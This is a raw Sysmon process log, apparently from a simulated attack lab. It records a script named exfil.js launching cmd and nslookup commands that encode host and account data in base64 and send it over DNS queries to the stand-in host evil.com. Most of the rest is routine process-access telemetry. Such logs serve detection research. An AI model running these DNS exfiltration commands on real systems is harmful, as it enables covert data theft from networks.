14:16:44.040{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.040{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.040{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.040{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.040{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-D841-000000005F02}7060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.040{2E1864BB-17CC-629A-D641-000000005F02}7628436C:\Windows\system32\cmd.exe{2E1864BB-17CC-629A-D841-000000005F02}7060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.045{2E1864BB-17CC-629A-D841-000000005F02}7060C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CC-629A-D641-000000005F02}7628C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwmkij.tmp 2>&1 10341000x8000000000000000203902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.025{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-D741-000000005F02}1344C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.025{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-D741-000000005F02}1344C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.010{2E1864BB-17CC-629A-D741-000000005F02}13445604C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-D641-000000005F02}7628C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.010{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-D741-000000005F02}1344C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.993{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-D641-000000005F02}7628C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.993{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.993{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.993{2E1864BB-17A1-629A-783D-000000005F02}55527792C:\Windows\System32\WScript.exe{2E1864BB-17CC-629A-D641-000000005F02}7628C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.993{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.993{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.004{2E1864BB-17CC-629A-D641-000000005F02}7628C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwmkij.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.993{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlszarhd.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043955Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:44.828{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBAB468DEA411B4B0823C9243A965877,SHA256=5C0F66D6F4859518E96B4F46CD051C64E7E93DC4B45E7B717A90A9357BC2699F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000204404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.994{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnkty.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.963{2E1864BB-17CD-629A-0A42-000000005F02}78241960C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-0B42-000000005F02}6244C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.963{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.963{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.963{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.963{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.963{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0B42-000000005F02}6244C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.963{2E1864BB-17CD-629A-0942-000000005F02}22366092C:\Windows\system32\cmd.exe{2E1864BB-17CD-629A-0B42-000000005F02}6244C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.975{2E1864BB-17CD-629A-0B42-000000005F02}6244C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CD-629A-0942-000000005F02}2236C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnkty.tmp 2>&1 10341000x8000000000000000204395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.960{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-0A42-000000005F02}7824C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.959{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-0A42-000000005F02}7824C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.941{2E1864BB-17CD-629A-0A42-000000005F02}78241960C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-0942-000000005F02}2236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.941{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0A42-000000005F02}7824C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 